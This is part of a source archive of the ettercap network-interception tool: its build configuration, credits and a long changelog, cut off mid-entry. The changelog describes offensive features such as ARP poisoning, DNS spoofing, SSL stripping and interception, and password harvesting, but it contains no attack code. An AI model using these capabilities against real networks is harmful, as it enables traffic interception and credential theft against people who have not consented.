ettercap-0.8.3.1/000775 000000 000000 00000000000 13711276346 013462 5ustar00rootroot000000 000000 ettercap-0.8.3.1/.gitignore000664 000000 000000 00000000650 13711276346 015453 0ustar00rootroot000000 000000 # Temp files *~ *.bak *.backup \#* .\#* *\# *.swp *.swap *.sav *.save *.autosav *.autosave # Generated binaries *.o *.obj *.elf *.lo *.ko *.so *.so.* *.dll *.dylib *.dynlib *.a *.la *.out *.output # Archives *.zip *.tar.* *.tgz *.gz *.bz2 *.bzip *.xz *.lz *.lzma *.7z *.deb *.rpm *.apk *.exe *.msi *.dmg *.ipa # Others tags .clang_complete gmon.out ettercap-*_debug.log libwdg-*_debug.log build/ include/config.h /obj-*/ ettercap-0.8.3.1/.travis.yml000664 000000 000000 00000012370 13711276346 015576 0ustar00rootroot000000 000000 # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # See YAML format https://en.wikipedia.org/wiki/YAML # See Travis CI (Continuous Integration) https://docs.travis-ci.com/ language: c branches: except: gh-pages compiler: - gcc - clang os: - osx - linux addons: apt: packages: - debhelper - bison - check - cmake - flex - groff - libbsd-dev - libcurl4-openssl-dev - libgtk2.0-dev - libidn11-dev - librtmp-dev - libltdl-dev - libluajit-5.1-dev - libncurses5-dev - libnet1-dev - libpcap-dev - libpcre3-dev - libssl-dev - libgtk-3-dev - libgeoip-dev env: # Default build. Release. - BUILD_ARGS="" # Debug build - BUILD_ARGS="-DCMAKE_BUILD_TYPE=Debug" # Everything that's optional - BUILD_ARGS="-DENABLE_PDF_DOCS=On -DENABLE_IPV6=On -DENABLE_LUA=On" # Everything that's optional, in Debug-mode - BUILD_ARGS="-DENABLE_PDF_DOCS=On -DENABLE_IPV6=On -DENABLE_LUA=On -DCMAKE_BUILD_TYPE=Debug" # Everything that's optional, GTK2 - BUILD_ARGS="-DENABLE_PDF_DOCS=On -DENABLE_IPV6=On -DENABLE_LUA=On -DGTK_BUILD_TYPE=GTK2" # Everything that's optional, GTK2 in Debug-mode - BUILD_ARGS="-DENABLE_PDF_DOCS=On -DENABLE_IPV6=On -DENABLE_LUA=On -DGTK_BUILD_TYPE=GTK2 -DCMAKE_BUILD_TYPE=Debug" # IPV6 + system libnet - BUILD_ARGS="-DENABLE_IPV6=On -DBUNDLED_LIBNET=Off" # IPV6 + bundled libnet - BUILD_ARGS="-DENABLE_IPV6=On -DSYSTEM_LIBNET=Off" # system curl, only - BUILD_ARGS="-DBUNDLED_CURL=Off" # bundled curl, only - BUILD_ARGS="-DSYSTEM_CURL=Off" # system check, only - BUILD_ARGS="-DBUNDLED_LIBCHECK=Off" # bundled check, only - BUILD_ARGS="-DSYSTEM_LIBCHECK=Off" # Lua + system luajit - BUILD_ARGS="-DENABLE_LUA=On -DBUNDLED_LUAJIT=Off" # Lua + bundled luajit - BUILD_ARGS="-DENABLE_LUA=On -DSYSTEM_LUAJIT=Off" # Disable Gtk - BUILD_ARGS="-DENABLE_GTK=Off" # Disable Curses - BUILD_ARGS="-DENABLE_CURSES=Off" # Disable Curses and Gtk - BUILD_ARGS="-DENABLE_GTK=Off -DENABLE_CURSES=Off" matrix: allow_failures: # since trusty required libraries are fine now, and travis moved to trusty some years ago. # We expect IPV6 + system libnet + ubuntu to fail :( #- os: linux # env: BUILD_ARGS="-DENABLE_IPV6=On -DBUNDLED_LIBNET=Off" # We expect system-only curl + ubuntu to fail :( #- os: linux # env: BUILD_ARGS="-DBUNDLED_CURL=Off" exclude: - os: osx env: BUILD_ARGS="" - os: osx env: BUILD_ARGS="-DCMAKE_BUILD_TYPE=Debug" - os: osx compiler: gcc env: BUILD_ARGS="-DENABLE_PDF_DOCS=On -DENABLE_IPV6=On -DENABLE_LUA=On" - os: osx compiler: gcc env: BUILD_ARGS="-DENABLE_PDF_DOCS=On -DENABLE_IPV6=On -DENABLE_LUA=On -DCMAKE_BUILD_TYPE=Debug" - os: osx compiler: gcc env: BUILD_ARGS="-DENABLE_PDF_DOCS=On -DENABLE_IPV6=On -DENABLE_LUA=On -DGTK_BUILD_TYPE=GTK2" - os: osx compiler: gcc env: BUILD_ARGS="-DENABLE_PDF_DOCS=On -DENABLE_IPV6=On -DENABLE_LUA=On -DGTK_BUILD_TYPE=GTK2 -DCMAKE_BUILD_TYPE=Debug" - os: osx env: BUILD_ARGS="-DENABLE_IPV6=On -DBUNDLED_LIBNET=Off" - os: osx env: BUILD_ARGS="-DENABLE_IPV6=On -DSYSTEM_LIBNET=Off" - os: osx env: BUILD_ARGS="-DBUNDLED_CURL=Off" - os: osx env: BUILD_ARGS="-DSYSTEM_CURL=Off" - os: osx env: BUILD_ARGS="-DBUNDLED_LIBCHECK=Off" - os: osx env: BUILD_ARGS="-DSYSTEM_LIBCHECK=Off" - os: osx env: BUILD_ARGS="-DENABLE_LUA=On -DBUNDLED_LUAJIT=Off" - os: osx env: BUILD_ARGS="-DENABLE_LUA=On -DSYSTEM_LUAJIT=Off" - os: osx env: BUILD_ARGS="-DENABLE_GTK=Off" - os: osx env: BUILD_ARGS="-DENABLE_CURSES=Off" - os: osx env: BUILD_ARGS="-DENABLE_GTK=Off -DENABLE_CURSES=Off" before_install: - if [ ${TRAVIS_OS_NAME} = "osx" ]; then brew update; brew install check curl; brew install groff gtk+ gtk+3; brew install libidn libnet; brew install luajit openssl pcre rtmpdump geoip; fi before_script: - if [ ${TRAVIS_OS_NAME} = "osx" ]; then export BUILD_ARGS="$BUILD_ARGS -DOPENSSL_ROOT_DIR=`brew --prefix openssl`";fi script: - if [[ "$CC" == "gcc" && "${BUILD_ARGS}" = "" ]]; then git clone https://github.com/richq/cmake-lint.git; cd cmake-lint; python setup.py install --user; cd -; ./misc/cmakelint.sh; fi - mkdir build - cd build - cmake -DENABLE_TESTS=On $BUILD_ARGS .. - make - make test_verbose notifications: irc: channels: - "chat.freenode.net#ettercap-project" template: - "ettercap-build #%{build_number} (%{commit} by %{author}): %{message}" - "See details at %{build_url}" email: false ettercap-0.8.3.1/AUTHORS000664 000000 000000 00000004522 13711276346 014535 0ustar00rootroot000000 000000 AUTHORS: -------- ALoR (Alberto Ornaghi) NaGA (Marco Valleri) PROJECT STEWARDS: ----------------- Emilio Escobar Eric Milam ============================================================================== OFFICIAL DEVELOPERS: Emilio Escobar (exfil) { Core Development } Mike Ryan (justfalter) { Core Development and Testing } Ryan Linn { Core Development and Testing } Gianfranco Costamagna (LocutusOfBorg) { Bug Hunting, Bug fixing and patch backporting } Jacob Baines { Development and Bug fixes } Antonio Collarino (sniper) { Core and Plugin Development, Testing } Alexander Koeppe (koeppea) { IPv6 support GTK UI Bug fixing } CONTRIBUTORS: ------------- Dhiru Kholia (kholia) { O5Logon, MySQL 5.x dissector, PostgreSQL dissector, TN3270 dissector } Mainframed { TN3270 dissector } Eric Milam (Brav0Hax) { User Testing } Frekky { dns_spoof plugin TTL option } CONTRIBUTORS (Lazarus): ----------------------- Martin Bos (PureHate) { Testing } Enrique Sanchez { Code Review } CONTRIBUTORS (for the Next Generation series): ---------------------------------------------- Gisle Vanem { for the mingw porting } Johannes Bauer { for the prism2 decoder } Daten (Bryan Schneiders) { the GTK interface } CONTRIBUTORS (for the First Generation series): ----------------------------------------------- Lnz (Lorenzo Porro) { some dissectors } Tavi (Octavian Mihalache) { win9x porting } Georg Hofstetter { HL-RCON dissector } Giorgio Zoppi { security patch } Garph0 { plugin porting for windows } Zero_Chaos { Lamer, buildscript kiddie fixes } ettercap-0.8.3.1/CHANGELOG000664 000000 000000 00000105031 13711276346 014674 0ustar00rootroot000000 000000 Legend: + new feature - old feature removed !! bug fixed ========================================= 0.8.3.1-Bertillon 20200801 !! Fix SSL protocol failure with older TLS client/server versions (min. TLS1.0) !! Fix blackholing SSL packets when specific redirection is used !! Fix TLS 1.3 interception issues (replace fake certificate with proper key length) !! Fix segmentation fault when parsing HTTP NTLM handshake (fixes #922) !! Fix crash if one redirect command is not enabled !! Fix build on MacOSX detecting new dependency HarfBuzz !! Fix warnings when parsing etter.(m)dns file when built w/o IPv6 support !! Fix capture delay with libpcap v1.9.1 (fixes #974) !! Fix segmentation fault when etterlog concatinate files !! Fix compiling with GCC version / defaulting to -fno-common !! Fix bad UDP length for packets changed with replace() !! Fix passing --lua-args arguments to LUA scripts !! Fix MSVC build when macro ORDER_ADD_{SHORT,LONG} is being used !! Fix references to old sourceforce.org website in the code and documentation !! Fix fingerprint_submit (still missing its server counterpart) + Take over client-side SNI extension in ClientHello in SSL interception (req. OpenSSL 1.1.1) + Take over SAN certificate extension from server certificate in SSL interception + Use server certificate sign algorithm to sign fake certificate defaulting to SHA256 + CLI provided plugins are now also autostarted in graphical UI + Added --plugin-list CLI parameter + New execreplace etterfilter command + Update bundled OUI mac addresses + Update LuaJIT from 2.0.4 to 2.0.5 + Update libnet from 1.1.6 to 1.2 + Update check from 0.10.0 to 0.15.0 + Update curl from 7.44.0 to 7.71.1 - Separate etter.dns and etter.mdns examples in dedicated examples file - Remove source IP specification from customizable SSL redirects - Remove of deprecated redirect commands from etter.conf - Remove Easter Egg (Sorry ALoR and NaGA) 0.8.3-Bertillon 20190701 !! Fix binary comparison and assignment in etterfilter !! Fixed packetbuffer racecond. in BRIDGE mode (e.g. Message too long) !! Non-aligned filters are no longer supported (recompilation with etterfilter required) !! Fixed sslstrip plugin startup issue due to regex compilation error !! Fixed lots of build warnings !! Proper separation of library and executable code !! Fixed heap-buffer-overflow in write_output in etterfilter !! ip_addr sanity check when etterlog processes info logfile !! CVE-2017-8366 (Lots of buffer under-/overflow conditions fixed) !! CVE-2017-6430 (Fix invalid read on crafted file in etterfilter) !! fix dns_spoof plugin when used in bridge mode + SSL redirects are now customizable at runtime + GeoIP detection / support using CMake + Rework of GTK3 UI - modern GNOME3 look + New Kerberos 5 downgrade plugin + GTK3 is the new default GTK_BUILD_TYPE + OSPF dissector supports more authentication methods in hash-cracker friendly format + Rework of Oracle O5LOGON dissector + Multi-threaded name resolution + Updated etter.finger.mac - GTK2 phase out initialized - Usage of deprecated inet_aton replaced with current successor functions 0.8.2-Ferri 20150314 !! Fixed some openssl deprecated functions usage !! Fixed log file ownership !! Fixed mixed output print !! Fixed drop_privs function usage !! Fixed nopromisc option usage !! Fixed missing break in parser code !! Improved redirect commands !! Fix truncated VLAN packet headers !! Fix ettercap.rc file (windows only) !! Various cmake fixes !! A ton of BSD bug fixes !! Simplify macosx cmake files !! Fix incorrect sequence number after TCP injection !! Fix pcap length, and alignment problems with libpcap !! Bug fixes and gtk code refactor (gtk box wrapper) !! Fix some ipv6 send issues !! Fixed sleep time on Windows (high CPU usage) !! Fixed many CVE vulnerabilities (some of them already fixed in 0.8.1) - CVE-2014-6395 (Length Parameter Inconsistency) - CVE-2014-6396 (Arbitrary write) - CVE-2014-9376 (Negative index/underflow) - CVE-2014-9377 (Heap overflow) - CVE-2014-9378 (Unchecked return value) - CVE-2014-9379 (Incorrect cast) - CVE-2014-9380 (Buffer over-read) - CVE-2014-9381 (Signedness error) + Updated etter.finger.mac + Add TXT and ANY query support on dns_spoof + New macosx travis-ci build! + Enable again PDF generation - Remove gprof support 0.8.1-Lombroso 20141016 !! Fixed incorrect checksum computation on 64-bit systems !! Fixed DNS resolution problems !! Fixed hurd build failure (not specific to hurd but hurd seems the first OS defining ESUCCESS in glibc) !! Fixed rpath handling !! Fixed scan host crash with recent kernels !! Fixed etter{log,filter} library path !! O5LOGON dissector fixes for stealth mode scans !! Fix constants to allow full hexadecimal characterset. Useful for filtering on ESP SPIs !! Fixed some incoherencies in gbls pointers in utils and core !! Fixed dhcp spoofing automatically start in text ui !! Many fixes in filter compiler !! Fixed lua installation path !! Many ipv6 fixes and improvements !! Fixed tests build failures !! Fixed many iconv detection problems !! Fixed many ctime problems !! Fixed many dissector ports !! Fixed timers incoherences !! Fixed powerpc build failure !! Fixed uniqueness of our include guards !! Fixed cmake warnings, by correctly linking our libraries !! Fixed clean target !! Fixed COOKIE_PATTERN string !! A ton of kfreebsd, freebsd, and MacOS fixes and build fixes !! Fixed with a new "regain_privs" the ip forwarding restore !! Fixed another scan crash !! Fixed host list updated (delegated to the main thread) !! Fixed etter.conf.v6 and etter.conf.v4 installation !! Fixed (removed) some old code !! Fixed (removed) some dbus interfaces listed in ettercap !! Fixed some libraries link issues !! Fixed various polkit installation directory issues !! Fixed plugin path issues !! Fixed bundled libs building order !! Fixed undefined ips added to the host list (e.g. 0.0.0.0 in dhcp discover) !! Fixed macosx builds !! Moved check framework in bundled_libs directory !! Fixed crash on scan for hosts, by adding a mutex !! Fixed libettercap.so linking, by removing curses and gtk stuff !! Fixed ip_add_to_int32 macro !! Fixed a ton of warnings in gtk, curses and core !! Fixed some documentation !! Fixed tests with eglibc >= 2.17 !! Fixed check framework find, with fallback in the bundled one if not available !! Fixed bug in etter.finger.mac parsing !! Fixed ssl checks on cmake, now it is mandatory !! Fixed scan for hosts progress bar !! Fixed linux.org ip address on etter.dns conf file !! Fixed some memory leakages !! Fixed missing RelWithDebInfo on Cmake !! Fixed typos !! Fixed some performance issues in scan for hosts function !! Fixed race condition when scan progress was canceled !! Fixed cmake flags passing !! Fixed IPv6 build !! Fixed debug messages + experimental ESP detection/filtering + make etter{log,filter} ipv6 compatible + Enabled multithread scan for Curses interface + New appdata xml file + New experimental GTK3 support! + New threaded host resolution! + Many build and runtime performances improvements + Ettercap builds on windows (MingW) again! + New arp "smart" poisoning! + New base64 encode and decode functions + New execinject etterfilter command + New ipv6 hidden scan mode + New support for multiple plugins in UI mode + New uninstall target + Gnu/Hurd support! + Automatically refresh plugin list + Threading some plugins + A new function for self-destruct plugins + New INSTALL_EXEDIR cmake option, now you can have "ettercap" and the other binaries in two different directories! + New Null/Loopback decoder! + Added automatic irc notifications! + Added some debug and fortify-source flags + Added some travis builds! + Updated etter.finger.mac + Added support for parsing RIPv2 and OSPF MD5 authentication packets + Updated curl and check bundled libraries + updated etter.filter.examples file + updated TODO list + etterfilter now is IPv6 ready! + Documentation updated + Man pages updated + New nd-poisoning! + Increased IPv6 probe delay from 2 seconds to 3 - Removed hex_encode stuff - Removed ec_pap.c since it was already implemented in ec_ppp.c - Removed duplicate code, in favour of libettercap usage 0.8.0-Lacassagne 20130921 !! Fixed some problems in fork and execve usage in case of command failure (sslstrip) !! Fixed dropping privileges for remote_browser plugin ran as root !! Fixed infinite loop when a http GET was issued on the attacker browser, while remote_browser was active !! Fixed some "atexit" bad references !! Fixed plugin load on text interface, if no number were entered !! Fixed problem spotted when ethtool wasn't installed on the machine !! Fixed old "ethereal" references !! Fixed missing newlines in printf !! Switching to ps2pdf as default (from ps2pdf13), it should point to ps2pdf14 on all distros !! Fix cmake file, dropped MACPORTS_BASE_DIRECTORY !! Fix problem in "stopping attacks" window not properly shown in gtk !! Fix problem in wrong pcap file saving !! Fix issue in send_udp function !! Fix problem in libnet rc detection !! Fix restore ip_forward by retrying up to 5 times !! Fix socket issues !! Fix for hex format display !! New send_tcp function, taking payload and length !! Fixed memory leak in remote browser plugin !! Fixed comparison bug in ec_decode !! Fixed UI input for GTK !! Fixed some memory leaks !! Fixed man pages and AUTHORS file !! Fixes in sslstrip plugin !! Many etter.dns fixes !! Many documentation fixes !! A ton of refactors/fixes in Cmake scripts !! Fix GTK crash when scanning hosts !! Fix build failure on Mac OS X 10.6 !! Crash fix in target selection !! Disabled UID change for remote browser plugin !! Fixed remote browser plugin !! A ton of fixes in protocols and dissectors (dhcp, http, ppp, mpls) + New ettercap logo + Renamed help menu to "?", to avoid double "H" shortcut + New WARN_MSG warning message + Added message in DHCP spoofing when no mitm has started + New horizontal scrollbar for messages in gtk view + Disabled offload warning messages (only in Release mode) + New ettercap-pkexec, policy and ettercap.desktop files for launching ettercap -G as a normal user with sudo privileges + Automatic host list refresh in GTK GUI after scanning + New fraggle plugin attack + New fields in etter.fields file + Cherry picked debian patches (svg icon) + Added content print on http dissector + Added support for negative dns replies + Creation of (experimental) unit tests + Creation of (experimental) libettercap + Now you can build just the ettercap library (libettercap) without any GUIs + Added travis-ci support + DNS spoofing for IPv6 addresses + PDF Docs generation is not optional + Added SRV query handling to DNS spoof + New mDNS spoof plugin + New low level decoders + New decoder for ip over pppoe + Added PPP DLT to interfaces + Add experimental Lua support to Ettercap + New Bundle libnet and curl + Full support for wifi decrypting (wep and wpa) - Disabled update feature (not working anymore and not secure) - Deprecated napster dissector 0.7.6-Locard 20130327 !! Fixed some parsing errors !! Fixes to TN3270 dissector and SSL Strip !! PostgreSQL dissector: Update output format to reflect release syntax for John the Ripper 1.7.9-Jumbo-8. The old format is still supported, but deprecated. !! Fixed memory leak in SSL Strip plugin !! Fixed check in invalid ip header !! Fixed QoS packets handling (they aren't dropped anymore) !! Fix in o5logon Heap Corruption !! New and updated OUI file !! Some memory leaks fixed !! Fixed some bugs in return values and fstat failures handling !! Fixed a bug in some password display (didn't get null terminated) !! Many fixes in gcc warnings when building !! Better cmake module to find curl and libnet !! Fixed bug in filters load !! Fixes in HTTP and HTTPs protocols !! Fixed UI deadlock !! Fixes in tcp and http handling (infinite loop and crash) !! Better reads in BGP to avoid invalid reads + New logo + Added ascii FQDN support to DHCP ACK + Added UA parsing to http packets + Added support for IPv4 and IPv6 Tunnels + New mDNS dissector + Added PPI support (per packet information) for wireless captures + Ensure that we find required packages with cmake + New clean-all cmake target + Print a message when done reading PCAP file - Removed 'u' and 'p' fields from etter.fields 0.7.5.3-Assimilation 20130201 !! Fixed ncurses host scan crash (already fixed in 0.7.5.2) !! Fixed ppp connection crash (already fixed in 0.7.5.2) !! Fixed only MiTM mode selecting text interface + Changed to version 0.7.5.3 to help distributions. 0.7.5.2-Assimilation 20130129 !! applied patch to fix CVE-2012-0722 !! fixed username detection in TN3270 dissector + Added new private-key and certificate-file options for SSL MiTM + Fix for crash in ncurses multiple scan for host mode + Fix for crash in ppp0 connections 0.7.5.1-Assimilation 20130103 !! fixed set_blocking() method preventing SSL MiTM from working !! changed SSLStrip plugin to use PCRE !! more improvements to SSLStrip plugin + Added MySQL 5.x dissector + Added O5Logon dissector + Added iSCSI CHAP dissector + Added TN3270 dissector + Added MongoDB dissector 0.7.5-Assimilation 20121015 !! fixed more memory leaks !! improved GTK GUI !! changed build system to CMake. + Added IPv6 poisoning and capture. + Added NBNS spoof plugin. + Added SSLStrip Plugin (EXPERIMENTAL) 0.7.4-Lazarus 20111202 !! fixed resource depletion issue !! buffer access out-of-bounds issues !! fixed DNS dissector not working on 64bit systems !! multiple buffer overflows !! multiple memory leaks !! multiple files with obsolete code !! fixed SEND L3 errors experienced by some users !! fixed a compilation error under Mac OS X Lion !! updated build system (Please see bug track for issue specifics) NG-0.7.4 2005 + added the radius dissector + go into unoffensive mode if libnet initialization fails !! etterfilter now accepts empty blocks !! the log files are closed on SIGTERM !! fixed a compilation error under Mac OS X Tiger !! fixed an improper handling of wdg_dynlist callback !! fixed bound checking in some dissectors NG-0.7.3 20050528 + added the INC (+=) and DEC (-=) operators to the filter engine !! fixed the compilation of some plugins !! fixed a segfault in the isolate plugin !! fixed a bug in the dhcp spoofing module !! fixed a serious security bug (a format bug in the curses gui) NG-0.7.2 20041221 + the hosts scan can now be canceled by the user (ctrl+q) + the netmask for the scan can now be specified within the GUI + checksum_check was renamed to checksum_warning and a new option to prevent the check was introduced (see the man page etter.conf(5) for details) + added the help menu (inline man pages) + wins support for the dns_spoof plugin + new plugin: repoison_arp !! do not drop privs under windows (useless) !! fixed the mmap problem under windows !! fixed file operation under windows (O_BINARY related) !! fixed the IRC password collector (\r \n related) !! fixes the dumping of the profiles to a file (fingerprint not recorded) !! the remote flag is now reset when the arp poisoning is stopped !! fixed the ebcdic visualization !! fixed the autoadd plugin when a target is ANY NG-0.7.1 20040920 + added the -s options to issue commands to the gui (useful in scripts) + added the -I options to show the list of NICs + ported to windows (mingw) + added a new plugin: isolate + updated os and mac fingerprints !! fixed compilation of strtok_r under solaris !! fixed a pthread problem under mac os X !! fixed the compilation with gcc 3.5.x !! fixed message box character wrapping (gtk) NG-0.7.0 20040705 + implemented a thread safe strtok + prepared the source for a smooth mingw porting !! fixed numeric sorting in gtk interface !! autoadd plugin does not add the local address !! dump profiles to file now dumps even host without any open port !! fixed compilation under freebsd 4.9 NG-0.7.0_rc1 20040614 + WEP decryption for WiFi packets + support for prism2 headers + added the -I search option in etterlog + you can now apply filters on pcapfiles and dump the results + you can now specify an alternative config file with -a !! log to file works again !! fixed a segfault dumping profiles to file !! fixed a segfault when opening not-readable dirs from the curses GUI !! fixed uninitialized data that caused segfault in the dhcp dissector !! etterlog -c respect the -f specification !! fixed some problems with non blocking ssl sockets !! "should be checksum" is now correct NG-0.7.0_pre2 20040517 + added support for UTF-8 strings + telnet collector enhancements (catches cisco login) + added new plugins: + find_ettercap + autoadd + the live connections list can be purged by the user + SSL support for the following dissector: + imaps + ircs + ldaps + nntps + pop3s + ssmtp + telnets + support for vlan tagging (802.1q header) + support for rawip file dumps + multiple selections in the GTK ui for targets and hosts + wifi enhancements !! fixed the $prefix issue in the configure !! fixed a linking problem against openssl !! some fixes in the man pages !! compiles against old openssl 0.9.6x !! better error handling on file creation failure !! fingerprint submissions works again !! fixed the configure checks for libpcap and libnet !! ec[ip] files are now platform independent !! fixed the "etter.ssl.crt not found" bug !! the arp_cop plugin now does not report the ettercap poisoning !! the filters are respected even logging to a eci file !! profiles in the eci file are not duplicated if arp poisoning NG-0.7.0_pre1 20040415 + rewrite from scratch (the code is now cleaner and well commented) + it now requires libpcap and libnet + support for unconfigured network interfaces + automake and libtool are now used for the configuration process + etterlog utility for logfiles parsing + etterfilter utility to compile advanced content filters + root privs dropped after initialization + big endian arch support (sparc64) + layer 3 routing (forwarding packets) + new media support for: + wifi + token ring + fddi + ppp + linux cooked interfaces + unified sniffing (you can use external hijacker) + new MITM methods: + advanced ARP poisoning engine (with many-to-many support) + ICMP redirect + DCHP spoofing + port stealing + multiple target selection + pcap filter on capture + regex packet matching + hook points per packet type (TCP, UDP... ) + quiet mode (don't print packet content) + enhanced passive open port discoverer + randomized ARP scan + cached dns resolution (increase speed and stealth) + enhanced statistics on ettercap performances + extended headers for every packet + passive DNS answer caching + global conf file always loaded to tweak internal variables + etter.conf supports dissectors on multiple ports + possibility to sniff on loopback + autoupdate from website for passive databases + non root users can use ettercap to read from files + unoffensive mode (doesn't forward packets) + user messages can be logged + dissector enhancements in: + POP (APOP and AUTH LOGIN/PLAIN support) + X11 (banner discovery) + TELNET (collect even failed attempts) + SNMP fixes + MySQL fixes + HalfLife and Quake3 were unified + SMB + SSH (blowfish support) + SSL (totally reworked, runs on all platforms) + HTTP has gained performance overhaul + ...many others + new dissectors: + SMTP + CVS + OSPF, VRRP + plugins were unified, no more distinctions between standalone and hooking + new plugins: + finger (SYN+ACK fingerprinting on remote hosts) + smb_clear, smb_down (attacks against the SMB protocol) + curses interface improvements: + resizable under X11 + mouse event are supported + customizable colors + completely new menu-driven interface + totally redesigned GTK+ interface + you can filter data with a visualization regexp + profiles can be dumped to a file + A lot of new bugs^H^H^H^H random features to be discovered ;) !! offline sniffing actually does not bind to any NICs - packet factory was removed - some plugins were not ported +++ too many other improvements to be listed here +++ 0.6.b 20030710 + Plugins now works with GTK+ interface + Updated the passive OS fingerprint database (1279 records) !! Fixed internal refreshing (for huge traffic loads) !! Fixed wifi-dump support !! Fixed doppelganger re-arp !! Fixed a problem with signed char under mac G3 !! Fixed some possible buffer overflows 0.6.a 20030505 + Buffered Data Connections (only for ncurses) + New Sniffing method (Port Stealing) + Updated the passive OS fingerprint database (1189 records) + enhanced smb dissector + enhanced troll plugin against request caching + NEW PLUGIN: Confusion,Hunter, SMB suite + partial wifi-dump support (experimental) !! Fixed demonization problem !! Fixed StateMachine problem !! a bouch of bug fix 0.6.9 20030125 + GTK+ 2.0 interface (experimental) (--enable-devel) + Windows Plugins porting + Updated the passive OS fingerprint database (1093 records) + Dissector Proxy 8080 + NTLM auth + Enhanced poisoning method (solaris issue) + NEW PLUGIN: troll, PPTP suite + text and ebcdic view from command line + lc-convert utility (share dir) !! Fixed a LIBS problem under MacOSX (-lpoll) !! Fixed the VNC dissector !! A bouch of bug fix (too many to list here) 0.6.7 20020702 + Updated the passive OS fingerprint database (853 records) !! Fixed the strlcpy bug in the the telnet dissector (oops alor mistake) !! Fixed a possible sigfault in the rlogin dissector !! Fixed the exit_func for Mac OS X 0.6.6.6 20020603 + Solaris porting + Sparc architecture support even for all other OSes + Windows 9X porting + Increased the speed of arp storm under windows + Added the ability to bind a port on which ettercap forwards the sniffed traffic + The -H option now supports range ip + NEW PLUGIN: lamia (become root of a switches spanning tree) + Updated the passive OS fingerprint database (825 records) !! Fixed the pthread_join problem under MacOSX !! Fixed the -w options (openssl path related bug) !! Fixed the conflicting options -Y and -a !! Fixed the FindIface function under BSD 0.6.5 20020423 + Windows (CYGWIN) porting + Dumping to and sniffing from tcpdump file format is now supported + Sniffing from command line now capture UDP+TCP packet by default + Logging engine doesn't log the same user/pass/ip twice + Under *BSD and MacOSX ettercap now uses only one bpf + Added the -J options (onlyposion) to allow multitarget arp sniffing + NEW PLUGIN : - roper (Tries to stop ISAKMP for IPSEC traffic) + NEW password collector for: QUAKE 3, ICQ v7, MSN, YMSG + DISSECTORS enhanced: HTTPS - IMAP - NAPSTER (opennap) - IRC + PLUGIN enhanced: - leech (now it rearps the victim after isolation) + DOCUMENTATION translated in Polish and Dutch !! Better handling of CTRL+C !! Fixed a bug the the dlsym on OpenBSD 3.0 (plugin related) !! Fixed a bug in the handling of debug file !! Fixed the "not scrolling" JOINED visualization 0.6.4 20020212 + You can sniff traffic from a remote cisco router and make mitm attacks on it using GRE tunnels. + Added some bits for the passive OS fingerprint database. Now even the length of the packet make sense. + The sniffing interface now supports JOINED view + NEW PLUGIN : - thief (dumps all files from HTTP) - zaratan (redirect GRE tunnels) + ICQ dissector now searches for passwords on all ports + Updated the passive OS fingerprint database (675 records) + Changed arg 2 of Plugin_HookPoint for PCK_RECEIVED_RAW !! Under OpenBSD the pflog interface is ignored !! Fixed the DATA_PATH issue in the phantom plugin !! Fixed an unsigned short in state_machine !! Fixed some plugins that don't recognize the 'yes' answer !! Fixed the plugins symbol problem on Mac OS X (strip -x) !! Fixed the possibility of remote exploitation on interface with MTU > 1500 0.6.3.1 20011213 !! Fixed the truncation of passwords in some dissectors !! Fixed the -undefined error problem for Mac OS X (darwin 1.4.x / 5.1) 0.6.3 20011212 + Grell dissector (HTTPS) now handles proxy auth + Grell dissector (HTTPS) now correctly handles SSL & TLS + Better connection status handling + Updated the passive OS fingerprint database (530 records) - Removed the --enable-suid option, so it is clear that ettercap is only for root !! Fixed a bug that implied to send on the net every packet sniffed from it (introduced in ettercap 0.6.2) !! Fixed the ENOBUFS error on BSD !! Fixed a bug for the compilation with --disable-plugins !! Fixed a bug for the compilation on Mac OS X without dlcompat libs !! Fixed the configure script to handle the -bundle_loader option under Mac OS X !! Fixed the command line format bug exploit (`ettercap %x%x%x%x%x`) !! !! Fixed many security threats in the code 0.6.2 20011112 + Ettercap is now a multi-thread single process. + The connection handling engine was enhanced and sped up + Now filtered (replaced) data can exceed the MTU + Completely new plugin conception (hooking plugin) + Better handling for unknown passive fingerprints + Possibility to load/save the hosts list from/to a file (-j -k options) - the -k (newcert) options was renamed to -w + Updated the passive OS fingerprint database (501 records) + Updated the active OS fingerprint database (2001/10/14) + New 'TEXT only' view on sniffed data + NEW password collector for: HALF LIFE, NFS, SNMP, LDAP + ENHANCEMENT in the password collector for: MySQL + NEW PLUGIN : dwarf (logs all POP and SMTP activity) !! Fixed a bug when recognizing HUB or SWITCH !! Fixed a bug in the banshee plugin !! Fixed a bug in the filtering engine from command line !! Fixed a sigfault in the HTTP dissector !! Plugins are now installed in {prefix}/lib/ettercap, not in share/ettercap !! ettercap is now installed in the more appropriate {prefix}/sbin/ !! now the configure script doesn't require root privileges to run !! configure now handles correctly the --datadir=DIR and --libdir=DIR directive. 0.6.0 20010917 + Passive scanning of the LAN + Plugins ported to Mac OS X (darwin) + Doppelganger now uses the new REQUEST ARP POISON (see readme) + Grell (HTTPS) now supports virtual hosts + The Logging engine for the simple mode was rewritten from scratch + Now MAC sniffing can have only one parameter + Updated the active OS fingerprint database + Updated the MAC fingerprint database + NEW PLUGIN : beholder and basilisk + PLUGIN enhanced: imp and triton !! configure script tuned up. now it compiles missing libs only if needed !! Fixed a bug preventing SSL sniffing !! Fixed a problem in illithid related to the smart arp sniffing !! Fixed a compilation problem for FreeBSD 4.0 (getifaddrs related) !! Fixed a compilation problem for MacOsX (termios related) !! Fixed a ioctl() problem in phantom plugin on *BSD and MacOsX 0.5.4 20010726 + Porting for Mac Os X (darwin 1.3.x) + Reverse IP matching (-R option) + Spoofing of the source ip on start up + Customizable delay between arp request on startup + Added the Inet_CloseRawSock API (for debugging purpose) + Better handling of SIGSEGV and SIGBUS (for debugging purpose) + Updated the OS fingerprint database + ENHANCEMENT in the password collector for: IRC + PLUGIN enhanced: triton + NEW PLUGIN : arpcop, phantom, imp !! Fixed the "make_label" compilation problem !! Fixed a sigfault on OS fingerprinting !! Fixed ip_forwarding restoring bug !! Fixed some ncurses visualization errors 0.5.2 20010707 + Plugins ported to OpenBSD + Porting for NetBSD 1.5 + Added FreeBSD 4 support for source MAC address spoofing + Illithid (the sniffer engine) totally rewritten and tuned up + Doppelganger (the arp 